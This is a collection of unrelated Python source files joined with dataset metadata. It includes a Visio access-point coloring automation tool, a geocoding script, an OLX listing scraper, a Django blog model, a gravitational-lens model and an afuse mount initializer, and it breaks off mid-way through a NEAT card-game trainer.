1\r\n excelStartingInteger -= 1\r\n formatNumber = format(apNumber, '05')\r\n apName = str(apPrefix) + str(formatNumber)\r\n print (apName + \" fix?\")\r\n time.sleep(.09)\r\n\r\n elif keyPress == ']': #goes up one ap number.\r\n apNumber += 1\r\n excelStartingInteger += 1\r\n formatNumber = format(apNumber, '05')\r\n apName = str(apPrefix) + str(formatNumber)\r\n print (apName + \" fix?\")\r\n time.sleep(.09)\r\n \r\n elif keyPress == 'pause': #Well it pauses everthing.....\r\n print('Paused')\r\n time.sleep(.3)\r\n pause() #Program is stuck in the pause loop until pause is pressed again\r\n\r\n elif keyPress == '=': #Saves the CAD Cutsheet and ends the Visio Tool \r\n saveExcel()\r\n exit(0)\r\n\r\n\r\n\r\nclass Options:\r\n def open_audit_sheet (self): #Opens a file explorer and returns path from chosen file\r\n global audit_sheet\r\n Tk().withdraw() # We don't want a full GUI, so keep the root window from appearing\r\n xlname = filedialog.askopenfilename() # Show an \"Open\" dialog box and return the path to the selected file\r\n print(\"Loading Excell File... \")\r\n audit_book = load_workbook(xlname)#Opens Excel\r\n audit_sheet = audit_book['Audit'] #grabs information from the \"audit\" sheet\r\n\r\n def audit_sheet_sorter (self): #reads all AP's from chosen Audit Sheet and categories them by their color\r\n global AP_red_list\r\n global AP_blue_list\r\n global AP_grey_list\r\n global AP_orange_list\r\n \r\n xlname_col = 'A' #column letter to read AP names from\r\n xlname_col_fail = 'K' #column letter to read fails from\r\n xlname_row = int('3') #Starting row in excel\r\n xlname_row_fail = int('3') #Starting row in excel\r\n \r\n AP_red_list = [] #initiates a list for green AP's ('2')\r\n AP_blue_list = [] #initiates a list for green AP's ('4')\r\n AP_grey_list = [] #initiates a list for green AP's ('1')\r\n AP_orange_list = [] #initiates a list for green AP's ('3')\r\n \r\n AP_red_count_list = int('0')#Keeps track how long the list is\r\n AP_blue_count_list = int('0')\r\n AP_grey_count_list = int('0')\r\n AP_orange_count_list = int('0') \r\n \r\n print(\"List of AP ID's:\")\r\n for AP in range (0, audit_sheet.max_row +1): #range of APS being colored\r\n xlname_col_fail_num = str(xlname_col_fail) + str(xlname_row_fail)\r\n xlname_col_num = str(xlname_col) + str(xlname_row)\r\n cell_value1 = audit_sheet[xlname_col_fail_num]\r\n cell_value2 = audit_sheet[xlname_col_num]\r\n AP_fail = cell_value1.value\r\n AP_ID = cell_value2.value\r\n \r\n if AP_fail == 1: #reads all green AP's\r\n AP_grey_list.append(AP_ID)\r\n print(AP_grey_list[AP_grey_count_list])\r\n AP_grey_count_list += 1\r\n\r\n elif AP_fail == 2: #reads all red AP's\r\n AP_red_list.append(AP_ID)\r\n print(AP_red_list[AP_red_count_list])\r\n AP_red_count_list += 1\r\n \r\n elif AP_fail == 3: #reads all orange AP's\r\n AP_orange_list.append(AP_ID)\r\n print(AP_orange_list[AP_orange_count_list])\r\n AP_orange_count_list += 1\r\n \r\n elif AP_fail == 4: #reads all blue AP's\r\n AP_blue_list.append(AP_ID)\r\n print(AP_blue_list[AP_blue_count_list])\r\n AP_blue_count_list += 1\r\n\r\n elif AP_fail == 5: #reads all red and orange AP's\r\n AP_red_list.append(AP_ID)\r\n print(AP_red_list[AP_red_count_list])\r\n AP_red_count_list += 1\r\n AP_orange_list.append(AP_ID)\r\n print(AP_orange_list[AP_orange_count_list])\r\n AP_orange_count_list += 1\r\n\r\n elif AP_fail == 6: #reads all red and blue AP's\r\n AP_red_list.append(AP_ID)\r\n print(AP_red_list[AP_red_count_list])\r\n AP_red_count_list += 1\r\n AP_blue_list.append(AP_ID)\r\n print(AP_blue_list[AP_blue_count_list])\r\n AP_blue_count_list += 1\r\n\r\n elif AP_fail == 7: #reads all orange and blue AP's\r\n AP_orange_list.append(AP_ID)\r\n print(AP_orange_list[AP_orange_count_list])\r\n AP_orange_count_list += 1\r\n AP_blue_list.append(AP_ID)\r\n print(AP_blue_list[AP_blue_count_list])\r\n AP_blue_count_list += 1\r\n\r\n else:\r\n print('End of Audit Sheets')\r\n break \r\n xlname_row_fail += 1\r\n xlname_row += 1\r\n print(f'Grey APs: {AP_grey_count_list} ')\r\n print(f'Red APs: {AP_red_count_list} ')\r\n print(f'Blue APs: {AP_blue_count_list} ')\r\n print(f'Orange APs: {AP_orange_count_list}')\r\n\r\n def search_options (self): #sets visio to search all pages for AP IDs, must be done before coloring\r\n print (\"\\nStarting Search...\")\r\n pyautogui.hotkey('ctrl', 'f')\r\n pyautogui.press(['tab','tab'])\r\n pyautogui.press('down')\r\n pyautogui.press('esc')\r\n \r\n\r\n #def font_white(self): \r\n #time.sleep(.05)\r\n #pyautogui.hotkey('alt', 'h')\r\n #pyautogui.hotkey('f', 'c')\r\n #pyautogui.press(['down','left','left','left','left','left','enter'])\r\n #print(\"Font set to white\")\r\n\r\n def auto_script_grey(self): #finds AP name in Visio and colors it GREEN,\r\n Options.search_options(self)\r\n AP_grey_count = 0\r\n for x in AP_grey_list: \r\n AP_num = AP_grey_list[AP_grey_count]\r\n AP_num_print = (AP_num[8:13]) if len(AP_num) > 5 else AP_num #Truncates site name, IDF, and AP letter.\r\n print(AP_num_print)\r\n pyautogui.hotkey('ctrl', 'f')\r\n pyautogui.typewrite(AP_num_print)\r\n pyautogui.press(['enter', 'esc','esc','tab','enter'])\r\n pyautogui.hotkey('shift','tab','enter')\r\n pyautogui.hotkey('shift','tab','enter')\r\n pyautogui.hotkey('alt', 'h')#line coloring\r\n pyautogui.press(['l','down','down','down','down','down','left','left','left','enter'])\r\n pyautogui.hotkey('alt', 'h')#fill coloring\r\n pyautogui.press(['i','down','down','down','down','down','left','left','left','enter'])\r\n AP_grey_count += 1 #adds one to total grey count\r\n print(f'Grey APs: {AP_grey_count}')\r\n\r\n def auto_script_red(self): #finds AP name in Visio and colors it RED, \r\n Options.search_options(self) \r\n AP_red_count = 0\r\n for x in AP_red_list: #finds AP name in Visio and colors it\r\n AP_num = AP_red_list[AP_red_count]\r\n AP_num_print = (AP_num[8:13]) if len(AP_num) > 5 else AP_num #Truncates site name, IDF, and AP letter.\r\n print(AP_num_print)\r\n pyautogui.hotkey('ctrl', 'f')\r\n pyautogui.typewrite(AP_num_print)\r\n pyautogui.press(['enter', 'esc','esc','tab','enter'])\r\n pyautogui.hotkey('shift','tab','enter')\r\n pyautogui.hotkey('shift','tab','enter')\r\n pyautogui.hotkey('alt', 'h')#line coloring\r\n pyautogui.press(['l','down','down','down','down','down','down','down','left','left','left','left','enter'])\r\n pyautogui.hotkey('alt', 'h')#fill coloring\r\n pyautogui.press(['i','down','down','down','down','down','down','down','left','left','left','left','enter'])\r\n #Options.font_white(self)\r\n AP_red_count += 1 #adds one to total red count\r\n print(f'Red APs: {AP_red_count}')\r\n\r\n def auto_script_orange(self): #finds AP name in Visio and colors it ORANGE,\r\n Options.search_options(self)\r\n AP_orange_count = 0\r\n for x in AP_orange_list: #finds AP name in Visio and colors it\r\n AP_num = AP_orange_list[AP_orange_count]\r\n AP_num_print = (AP_num[8:13]) if len(AP_num) > 5 else AP_num #Truncates site name, IDF, and AP letter.\r\n print(AP_num_print)\r\n pyautogui.hotkey('ctrl', 'f')\r\n pyautogui.typewrite(AP_num_print)\r\n pyautogui.press(['enter', 'esc','esc','tab','enter'])\r\n pyautogui.hotkey('shift','tab','enter')\r\n pyautogui.hotkey('shift','tab','enter')\r\n pyautogui.hotkey('alt', 'h')#line coloring\r\n pyautogui.press(['l','down','down','down','down','down','down','down','left','left','left','enter'])\r\n pyautogui.hotkey('alt', 'h')#fill coloring\r\n pyautogui.press(['i','down','down','down','down','down','down','down','left','left','left','enter'])\r\n #Options.font_white(self)\r\n AP_orange_count += 1 # adds one to total orange count\r\n print(f'Orange APs: {AP_orange_count}')\r\n\r\n def auto_script_blue(self): #finds AP name in Visio and colors it BLUE,\r\n Options.search_options(self)\r\n AP_blue_count = 0\r\n for x in AP_blue_list: \r\n AP_num = AP_blue_list[AP_blue_count]\r\n AP_num_print = (AP_num[8:13]) if len(AP_num) > 5 else AP_num #Truncates site name, IDF, and AP letter.\r\n print(AP_num_print)\r\n pyautogui.hotkey('ctrl', 'f')\r\n pyautogui.typewrite(AP_num_print)\r\n pyautogui.press(['enter', 'esc','esc','tab','enter'])\r\n pyautogui.hotkey('shift','tab','enter')\r\n pyautogui.hotkey('shift','tab','enter')\r\n pyautogui.hotkey('alt', 'h')#line coloring\r\n pyautogui.press(['l','down','down','down','down','down','down','down','right','enter'])\r\n pyautogui.hotkey('alt', 'h')#fill coloring\r\n pyautogui.press(['i','down','down','down','down','down','down','down','right','enter'])\r\n #Options.font_white(self)\r\n AP_blue_count += 1 #adds one to total blue count\r\n print(f'Blue APs: {AP_blue_count}')\r\n \r\n #def auto_script_total(self):\r\n #print(f'Total APs: ')\r\n #print(f'Total Failed APs:')\r\n\r\n def save_new_sheet(self): #Pop-up message box, asks if user wants to save sorted date to new excell file/sheet\r\n result = messagebox.askyesno(\"Visio AP Coloring Tool\",\"Do you want to save data in new Excell?\")\r\n print(result)\r\n if result == True:\r\n print(\"data saved in 'New File'\")\r\n \r\n else:\r\n pass\r\n\r\n\r\nclass AutoColor(tkinter.Frame): #POP-UP GUI for choosing majority of Sheets color\r\n def __init__(self, master=None):\r\n super().__init__(master)\r\n self.master = master\r\n self.pack()\r\n self.create_widgets()\r\n\r\n def create_widgets(self): #buttons in the GUI\r\n self.title = tkinter.Label(self, font = 30, text = \"Select a color to highlight:\")\r\n self.title.pack(side = \"top\", pady = 30)\r\n\r\n self.option1 = tkinter.Button(self, fg = \"grey\") #Button, colored green\r\n self.option1[\"text\"] = \"Grey\" #button, named green\r\n self.option1[\"command\"] = self.output1 #when button pressed, execute output1\r\n self.option1.pack(side=\"top\") #position selt at top most position\r\n self.option2 = tkinter.Button(self, text = \"Red\", fg = \"red\", command = self.output2).pack(side=\"top\")\r\n self.option3 = tkinter.Button(self, text = \"Orange\", fg = \"orange\", command = self.output3).pack(side=\"top\")\r\n self.option4 = tkinter.Button(self, text = \"Blue\", fg = \"blue\", command = self.output4).pack(side=\"top\")\r\n self.quit = tkinter.Button(self, text=\"QUIT\", command=self.close)\r\n self.quit.pack(side=\"bottom\", pady = 30)\r\n\r\n def output1(self): #colors all green\r\n print(\"Coloring all GREY APs...\")\r\n print(\"QUICK! You have 5 seconds to click into your visio file!!!\\n\")\r\n time.sleep(5)\r\n Options.auto_script_grey(self) \r\n #self.close()\r\n\r\n def output2(self): #colors all red\r\n print(\"Coloring all RED APs...\")\r\n print(\"QUICK! You have 5 seconds to click into your visio file!!!\\n\")\r\n time.sleep(5)\r\n #Options.font_white(self) \r\n Options.auto_script_red(self)\r\n #self.close()\r\n\r\n def output3(self): #colors all orange\r\n print(\"Coloring all ORANGE APs...\")\r\n print(\"QUICK! You have 5 seconds to click into your visio file!!!\\n\")\r\n time.sleep(5) \r\n # Options.font_white(self) \r\n Options.auto_script_orange(self) \r\n #self.close()\r\n\r\n def output4(self): #colors all blue\r\n print(\"Coloring all BLUE APs...\")\r\n print(\"QUICK! You have 5 seconds to click into your visio file!!!\\n\")\r\n time.sleep(5)\r\n #Options.font_white(self) \r\n Options.auto_script_blue(self) \r\n #self.close()\r\n \r\n def close(self): #Ends the porgram when user selcts \"QUIT\"\r\n print(\"Closing program... Have a nice day :)\")\r\n time.sleep(1)\r\n exit(0)\r\n\r\n\r\ndef main():\r\n #choice = \"\" #creates a blank string for user input\r\n keyPress = \"\"\r\n #while choice != \"3\": \r\n while keyPress != \"p\": \r\n print(\"Enter '[' to open Visio AP Naming tool\")\r\n print(\"Enter ']' to open Visio AP Coloring tool\")\r\n print(\"Enter 'p' to quit program\\n\")\r\n #choice = input(\">>> \")\r\n keyPress = keyboard.read_key()\r\n print(keyPress)\r\n if keyPress == \"[\":\r\n print(\"Starting Visio Naming Tool...\") \r\n \r\n theGUI()\r\n\r\n #vnt.theGUI() #the GUI function calls these internally:\r\n break #vnt.startWorkbook() \r\n #vnt.openFiles()\r\n #vnt.visioLoop()\r\n #vnt.visioGuts()\r\n #vnt.saveExcel() \r\n elif keyPress == \"]\":\r\n #AutoColor Tool\r\n print(\"Starting Visio Color Tool...\")\r\n start = Options()\r\n start.open_audit_sheet()\r\n start.audit_sheet_sorter()\r\n root = tkinter.Tk()\r\n A_C = AutoColor(master=root)\r\n A_C.master.title(\"Visio AP Coloring Tool\")\r\n A_C.mainloop()\r\n break\r\n \r\n else:\r\n print(\"Invalid input\")\r\n pass\r\n\r\n\r\nif __name__ == \"__main__\":\r\n main() #this is the call to run the whole program\r\n\r\n\r\n###Instead of coloring passed APs Green, now they are GREY\r\n#respective varibles changes to accomadate grey coloring\r\n#added new funtionality to change the font to white after selecting and filling the failed APs\r\n#this is because the font wont default to White, it will be the new Grey color scheme\r\n#added full code of the V.N.T. into the combo script, no more calling to outside files","sub_path":"Combo Script 2.2.0/Combo Script 2.2.py","file_name":"Combo Script 2.2.py","file_ext":"py","file_size_in_byte":21317,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"161151240","text":"from geopy.geocoders import Here, Nominatim\nimport ssl\n\nimport json\nimport time\n\nfile = open(r\"/Library/WebServer/Documents/JSConferences/data2019.json\", \"r\", encoding=\"utf-8\")\ndata = json.load(file)\nfeatures = data[\"features\"]\n\ngeojsonFeatures = []\n\nwhile len(features) > 0:\n feat = features.pop(0)\n address = feat[\"city\"] + \"+\" + feat[\"country\"]\n print(address)\n #geolocator = Nominatim(user_agent=\"Ralucas-app\", ssl_context= ssl.SSLContext())\n geolocator = Here(app_id=\"\", app_code=\"\", ssl_context= ssl.SSLContext())\n location = geolocator.geocode(address)\n if location is not None:\n geojsonFeature = {\n \"type\": \"Feature\",\n \"properties\": feat,\n \"geometry\": {\n \"type\": \"Point\",\n \"coordinates\": [\n location.longitude,\n location.latitude\n ]\n }\n }\n geojsonFeatures.append(geojsonFeature)\n print(geojsonFeature)\n time.sleep(5)\n print(\"------------------\")\ngeojson = {\n \"type\": \"FeatureCollection\",\n \"features\": geojsonFeatures\n}\n\nprint(geojson)\n","sub_path":"geocode.py","file_name":"geocode.py","file_ext":"py","file_size_in_byte":1127,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"371526836","text":"import unittest\nimport fizz_buzz\n\nfb = dict()\nfb[1] = 1\nfb[3] = \"Fizz\"\nfb[5] = \"Buzz\"\nfb[15] = \"FizzBuzz\"\n\n\nclass TestFizzBuzz(unittest.TestCase):\n def test_case(self):\n for k, v in fb.items():\n self.assertEqual(v, fizz_buzz.get_fizz_buzz(k))\n\n\nif __name__ == '__main__':\n unittest.main()\n","sub_path":"test_module.py","file_name":"test_module.py","file_ext":"py","file_size_in_byte":313,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"142016128","text":"#Import bibliotek\nimport pandas as pd\nfrom bs4 import BeautifulSoup\nimport requests\nimport seaborn as sns\nfrom datetime import datetime, timedelta\nsns.set_style(\"whitegrid\")\n\n#Dni miesiąca do zamiany stringów \"dzisiaj\" i \"wczoraj\"\ntoday = str(datetime.today().day)\nyesterday = str((datetime.today()-timedelta(1)).day)\n\n\n\n#Funkcja do apply - dodanie 0 przed jednocyfrowymi dniami\ndef daty_naprawa(row):\n if len(row) == 5:\n return \"0\" + str(row)\n else:\n return row\n \n \n#Funkcja do zliczania liczby stron w ramach wyszukiwanego przedmiotu\ndef count_pages(url):\n request = requests.get(url).text\n soup = BeautifulSoup(request, 'html.parser')\n pages = []\n last_page = soup.find_all(\"a\", {\"class\":\"block br3 brc8 large tdnone lheight24\"})\n for x in last_page:\n pages.append(x.get_text(strip=True))\n return int(pages[-1])\n\n#Parser dla jednej strony wyszukiwanego przedmiotu\ndef olx_page_parser(url):\n request = requests.get(url).text\n soup = BeautifulSoup(request, 'html.parser')\n #Tytuły ogłoszeń\n titles_list = []\n h3 = soup.find_all(\"h3\", {\"class\":\"lheight22 margintop5\"})\n for x in h3:\n titles_list.append(x.find('a').get_text(strip=True))\n \n #Ceny\n prices_list = []\n prices = soup.find_all(\"p\", {\"class\":\"price\"})\n for x in prices:\n prices_list.append(x.get_text(strip=True))\n \n #Lokalizacje\n locations_list = []\n locations = soup.find_all(\"small\", {\"class\" : \"breadcrumb x-normal\"})\n i = 0\n for x in locations:\n try:\n if i % 2 == 0:\n locations_list.append(x.find('span').get_text(strip=True))\n i+=1\n except AttributeError:\n pass\n \n #Daty dodania ogłoszeń\n dates_list = []\n dates = soup.find_all(\"small\", {\"class\" : \"breadcrumb x-normal\"})\n i = 1\n for x in dates:\n if i % 3 == 0:\n dates_list.append(x.get_text(strip=True))\n i+=1\n \n #Stworzenie DataFrame z list\n df = pd.DataFrame({'Tytul' : titles_list,\n 'Cena': prices_list,\n 'Lokalizacja': locations_list,\n 'Data dodania' : dates_list})\n return df\n\n#Crawler po stronach i processing dat\ndef parse_olx(url, filename):\n pages = count_pages(url)\n df = pd.DataFrame()\n #Pętla - wykonaj scraping dla każdej strony wyszukiwanego przedmiotu\n for page in range (1, pages):\n print(\"Scrapuję stronę \" + str(page))\n new_url = url + \"?page=\" + str(page)\n df_page = olx_page_parser(new_url)\n df = df.append(df_page)\n df = df.drop_duplicates()\n #Naprawienie dat\n df[\"Data dodania\"] = df[\"Data dodania\"].apply(daty_naprawa)\n df[\"Data dodania\"] = df[\"Data dodania\"].replace({\"dzisiaj\" : today+\" lut\", \"wczoraj\" : yesterday+\" lut\"}, regex=True)\n df[\"Data dodania\"] = df[\"Data dodania\"].apply(lambda x: x.split()[0:2])\n df[\"Data dodania\"] = df[\"Data dodania\"].apply(lambda x: ' '.join(x))\n df[\"Data dodania\"] = df[\"Data dodania\"].replace({\"sty\" : \"/01\", \"lut\" : \"/02\"}, regex=True)\n df[\"Data dodania\"] = '2020/' + df[\"Data dodania\"]\n df[\"Data dodania\"] = df[\"Data dodania\"].replace({\" \": \"\"}, regex=True)\n df[\"Data dodania\"] = pd.to_datetime(df[\"Data dodania\"], format='%Y/%d/%m')\n df = df.sort_values(by='Data dodania')\n df = df.set_index([\"Data dodania\"]) \n #Zamiana ceny na wartość liczbową\n df[\"Cena\"] = df[\"Cena\"].replace({\" zł\" : \"\", \"Zamienię\" : np.nan, \" \" : \"\", \",\" : \".\"}, regex=True)\n df[\"Cena\"] = df[\"Cena\"].astype(float)\n #Zapisanie do pliku xlsx\n df.to_excel(filename+\".xlsx\")\n return df","sub_path":"olx_parser.py","file_name":"olx_parser.py","file_ext":"py","file_size_in_byte":3651,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"570810807","text":"from django.db import models\nfrom ckeditor_uploader.fields import RichTextUploadingField\nfrom django.contrib.auth.models import User\n\n\nclass BlogPost(models.Model):\n title = models.CharField(max_length=10000, default='')\n content = RichTextUploadingField(blank=True, null=True)\n image = models.ImageField(upload_to='img/blog/')\n datetime = models.DateTimeField(auto_now_add=True)\n user = models.ForeignKey(User, default=None, null=True, on_delete=models.SET_DEFAULT)\n\n class Meta:\n ordering = ['-datetime']\n","sub_path":"russianseasons/models/BlogPost.py","file_name":"BlogPost.py","file_ext":"py","file_size_in_byte":532,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"232838900","text":"from ArtificialAgent import ArtificialAgent\nfrom Display import Display\nfrom HumanAgent import HumanAgent\nfrom State import State\n\n\nclass Game:\n display = None\n\n def __init__(self, n, m, g, nhp, abdepth, display=True):\n self.n, self.m, self.g = n, m, g\n self.agents = [ArtificialAgent(i, n, m, abdepth) if nhp > i else HumanAgent(i) for i in range(1, -1, -1)]\n if display:\n self.display = Display(n, m, g)\n self.display.startupdateloop()\n self.state = State(n, m, g)\n\n def play(self):\n done = False\n while not done:\n for agent in self.agents:\n move = agent.play(self.state)\n self.state.add(move)\n self.display.addmove(move)\n if self.state.finished():\n print('done')\n done = True\n break\n","sub_path":"Game.py","file_name":"Game.py","file_ext":"py","file_size_in_byte":887,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"604224851","text":"number1 = int(input('enter first number : '))\nnumber2 = int(input('enter second number : '))\n\n\ndef gcd(a, b):\n \n if a > b:\n small = b\n else:\n small = a\n for i in range(1, small+1):\n if((a % i == 0) and (b % i == 0)):\n gcd = i\n \n return gcd\n \n\n \nprint (\"The gcd of {} and {} is : {} \".format(number1,number2,gcd(number1,number2)))\n","sub_path":"7.py","file_name":"7.py","file_ext":"py","file_size_in_byte":394,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"375688889","text":"from divide_by_people import Divider\nfrom speech_to_text import Converter\n\n\nclass AudioNote:\n def getResult(self, filename, path):\n d = Divider()\n c = Converter()\n wavfiles, speaker = d.divide(filename, path)\n index = 0\n f = open(\"out.txt\", \"w\")\n for fn in wavfiles:\n text = c.convert(path + fn)\n f.write('Speaker ')\n f.write(str(speaker[index]))\n f.write(': ')\n for t in text:\n f.write(t)\n f.write('\\n')\n index = index + 1\n\nif __name__ == '__main__':\n data = AudioNote()\n data.getResult('meeting.wav', './media/')\n","sub_path":"audio_note.py","file_name":"audio_note.py","file_ext":"py","file_size_in_byte":658,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"478423025","text":"#!/usr/bin/env python2\n\n# Initializes afuse according to file\n# usage: ./init.py [afusetab]\n# afusetab: list of afuse mounts to init. If none are present, local file named afusetab is assumed.\n\nfrom __future__ import print_function\nimport sys\nimport os\nimport yaml\nimport re\nimport argparse\n\nparser = argparse.ArgumentParser(description='Initialize afuse according to a file')\nparser.add_argument('afusetab',nargs='?',default=None,help='Location of the afusetab file to parse. Defaults to \"afusetab\" located near script')\nparser.add_argument('-f','--foreground',help='run afuse in foreground (for troubleshooting)',action='store_true')\nargs = parser.parse_args()\n\nafusetab = args.afusetab\nif afusetab is None:\n afusetab = os.path.join(os.path.dirname(__file__),'afusetab')\ntry:\n with open(afusetab,'r') as f:\n doc = yaml.load(f)\nexcept:\n raise Exception(\"couldn't prase afusetab. Make sure it exists and valid\")\n #print(\"couldn't prase afusetab. Make sure it exists and valid\", file=sys.stderr)\n #sys.exit(2)\n\n# script paths:\nd = os.path.dirname(os.path.abspath(__file__))\nhandles=\"%s/handle.py\" % (d)\nlists=\"%s/list.py\" % (d)\n\n# convert afusetab to fully qualified location\nafusetab=os.path.abspath(os.path.expanduser(afusetab))\n\n\n# find all roots in the document, and for every one of those invoke a proper command\nfor root in doc:\n realroot=os.path.abspath(os.path.expanduser(root))\n mounttemplate='mount_template=%s %s %s %%r %%m mount' % (handles,afusetab,root)\n unmounttemplate='unmount_template=%s %s %s %%r %%m unmount' % (handles,afusetab,root)\n poproottemplate='populate_root_command=%s %s \\'%s\\'' % (lists,afusetab,root)\n callarr = ['afuse','-o','nonempty','-o',mounttemplate,'-o',unmounttemplate,'-o',poproottemplate,realroot]\n if(args.foreground): callarr.append('-f')\n from subprocess import call\n call(callarr)\n","sub_path":"init.py","file_name":"init.py","file_ext":"py","file_size_in_byte":1872,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"55098784","text":"import numpy as np\nimport scipy;from scipy import ndimage\nimport matplotlib;from matplotlib import pyplot as plt\n\nGX,GY,GB,GE,GPA,GSM,GSA = range(7)\nSX,SY,SF,SW,SE,SPA = range(6)\n\ndef shift_func(coords,xoff,yoff):\n return (yoff[coords[0],coords[1]],xoff[coords[0],coords[1]])\n\ndef sie (x,y,lb,le,lpad,smag,sangd):\n lpa,sang = np.deg2rad(lpad),np.deg2rad(sangd)\n cpa,spa = np.cos(lpa),np.sin(lpa)\n xp,yp = x*cpa + y*spa, -x*spa + y*cpa\n phis = np.arctan2 (yp,xp)\n sphis,cphis = np.sin(phis),np.cos(phis)\n axrat = 1.0-le\n sqaxrat = np.sqrt(axrat)\n axprime = np.sqrt(1.0-axrat*axrat)\n kappa = 0.5*sqaxrat/np.hypot(xp/lb,axrat*yp/lb)\n gamma1 = kappa*(2.*sphis*sphis-1.0)\n gamma2 = -kappa*2.*sphis*cphis\n fasin = np.arcsin(axprime*sphis)\n fasinh = np.arcsinh (axprime*cphis/axrat)\n fratio = sqaxrat/axprime\n pot = np.hypot(x,y)*lb*fratio*(sphis*fasin+cphis*fasinh)\n xs,ys = xp - lb*fratio*fasinh, yp - lb*fratio*fasin\n xp,yp = xs*cpa - ys*spa, xs*spa + ys*cpa\n csang,ssang = np.cos(2.*sang),np.sin(2.*sang)\n csath,ssath = np.cos(2.*(sang-lpa)),np.sin(2.*(sang-lpa))\n xp += -smag * (x*csang + y*ssang)\n yp += -smag * (x*ssang - y*csang)\n gamma1 += smag*csath\n gamma2 -= smag*ssath\n return xp,yp,kappa,gamma1,gamma2,pot\n\ndef lens (g,a=[],gpix=128):\n try:\n x,y = a[1]-g[GX],a[0]-g[GY]\n except:\n x,y=np.meshgrid(np.arange(gpix)-g[GX],np.arange(gpix)-g[GY]) \n xp,yp,kappa,gamma1,gamma2,pot = sie (x,y,g[GB],\\\n max(g[GE],1.E-5),g[GPA],g[GSM],g[GSA])\n u = np.array(([kappa+gamma1, gamma2, gamma2, kappa-gamma1]))\n return u,np.array([x-xp,y-yp]),pot\n\ndef mxrot (a, angle):\n t = np.zeros_like(a)\n c,s = np.cos(np.deg2rad(angle)),np.sin(np.deg2rad(angle))\n t[0],t[1],t[2],t[3] = c*a[0]+s*a[2], c*a[1]+s*a[3],\\\n -s*a[0]+c*a[2],-s*a[1]+c*a[3]\n return t\n\ndef scene (ag, s, gpix):\n ag = [ag] if ag.ndim==1 else ag\n aoff = np.zeros((2,s.shape[0],s.shape[1]))\n for g in ag:\n u,alpha,pot = lens(g,[],gpix)\n aoff[0] += alpha[0]\n aoff[1] += alpha[1]\n xoff,yoff = np.meshgrid (np.arange(s.shape[0],dtype='float'),\\\n np.arange(s.shape[1],dtype='float'))\n xoff -= aoff[0]\n yoff -= aoff[1]\n return ndimage.geometric_transform(s,shift_func,extra_arguments=(xoff,yoff))\n\ndef gcsm (ag,src,gpix):\n if len(src):\n allpot,a,aoff = 0.0, np.array([1.,0.,0.,1.]), np.array([0.0,0.0])\n else:\n allpot = np.zeros((gpix,gpix))\n a = np.zeros((4,gpix,gpix)); a[0]=1.; a[3]=1.\n aoff = np.zeros((2,gpix,gpix))\n\n for g in ag:\n u,alpha,pot = lens(g,[src[0],src[1]],gpix) if len(src) else lens(g,[],gpix)\n allpot += pot\n kappa = 0.5*(u[0]+u[3])\n u[0]-=kappa\n u[3]-=kappa\n u = mxrot(u,-2*g[GPA])\n u[0]+=kappa\n u[3]+=kappa\n a -= u\n aoff[0] += alpha[0]\n aoff[1] += alpha[1]\n# tdel -= allpot # !!! tdel comes out wrong at the moment\n tdel = 0.0\n mag = 1.0/(a[0]*a[3]-a[1]*a[2])\n return a,aoff,allpot,tdel\n\ndef draw_caus (s,ag,filt=2.0,blc=[0,0],trc=[0,0],gpix=128):\n \n trc = [gpix,gpix]#trc if trc.sum() else\n a,aoff,allpot,tdel = gcsm (ag,[],gpix)\n mag = (a[0]*a[3]-a[1]*a[2])\n # plt.clf()\n # plt.imshow(mag)\n # plt.show()\n # plt.contour(scipy.ndimage.gaussian_filter(mag[blc[1]:trc[1],blc[0]:trc[0]],\\\n # filt),levels=[0.0],colors='black')\n print (mag.shape)\n copymag = np.copy(mag)\n zoomfac = 3\n # copymag = scipy.ndimage.zoom(copymag, zoomfac) \n print (mag.shape)\n caus = 0.0*mag\n print (caus.shape)\n \n for iy in range(gpix):\n for ix in range(gpix):\n if mag[iy,ix]**2. < 0.0001:\n jy = iy-aoff[1,iy,ix]\n jx = ix-aoff[0,iy,ix]\n try:\n caus[np.int(jy),np.int(jx)]=1.0\n except:\n pass\n # caus = scipy.ndimage.zoom(caus, zoomfac)\n# fig, ax = plt.subplots(subplot_kw={'aspect': 'equal'})\n trc[0]*=zoomfac\n trc[1]*=zoomfac\n print( trc, blc)\n magmag = 1/np.abs(mag)\n np.putmask(magmag, magmag>10000, 10000)\n # magmag = np.log10(magmag)\n # ax.imshow(magmag)\n # ax.imshow(caus[blc[1]:trc[1],blc[0]:trc[0]], cmap = 'gray_r')\n # ax.contour(scipy.ndimage.gaussian_filter(copymag[blc[1]:trc[1],blc[0]:trc[0]],\\\n # filt),levels=[0.0],colors='black')\n # from matplotlib.patches import Ellipse \n # ax.add_patch(Ellipse((s[0],s[1]), width=1, height = 1, fill = 0, color = 'red'))\n # for j in range(1):\n # for i in xrange(comps[j].shape[0]):\n # xpos = comps[j][i,0]\n # ypos = comps[j][i,1]\n # ax.add_patch(Ellipse((xpos,ypos), width=5, height = 5, fill = 0, color = 'blue'))\n # plt.show() \n return caus, magmag, copymag , blc, trc \n \n\ndef groot(ag,s):\n return s\n","sub_path":"pgetu.py","file_name":"pgetu.py","file_ext":"py","file_size_in_byte":4966,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"125065875","text":"from neat import population, parallel\nimport math\nimport neat\nimport carte\nimport gioco\nimport itertools\nimport pickle\nimport giocatore\nfrom neural_player import NeuralPlayer\n\ndef eval_fitness(genoma):\n tot = 0\n for i in range(100):\n tot += gioca(genoma)\n tot /= 100\n return tot\n\ndef gioca(genoma):\n game = gioco.Gioco(2)\n g1 = giocatore.Giocatore([carte.Carta(carte.Seme.BASTONI, 2),carte.Carta(carte.Seme.BASTONI, 2),carte.Carta(carte.Seme.BASTONI, 2)])\n g1.mano = game.giocatori[0].mano\n\n g2 = 